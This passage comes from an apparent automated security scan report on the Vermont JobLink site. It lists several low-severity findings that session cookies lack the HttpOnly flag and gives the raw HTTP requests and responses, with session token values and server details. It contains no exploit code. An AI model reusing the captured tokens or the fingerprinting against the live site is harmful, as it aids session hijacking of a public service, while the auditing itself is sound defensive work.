PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.235. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_quicksearch_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_quicksearch_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.236. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_registration_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
location: mn_empagreement_dsp.cfm
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
<!-- Caching is Off -->

14.237. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_settings_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_settings_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.238. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_ssncheck.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_ssncheck.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.239. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_veterans_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_veterans_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.240. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_warn_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_warn_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada/mn_warninfo_dsp.cfm
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->

14.241. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/services/schools/schsearch.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/services/schools/schsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.242. https://www.vermontjoblink.com/ada/works/FAQ.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/FAQ.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/FAQ.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.243. https://www.vermontjoblink.com/ada/works/Login.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/Login.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/Login.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:04 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.244. https://www.vermontjoblink.com/ada/works/contactus.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/contactus.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/contactus.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
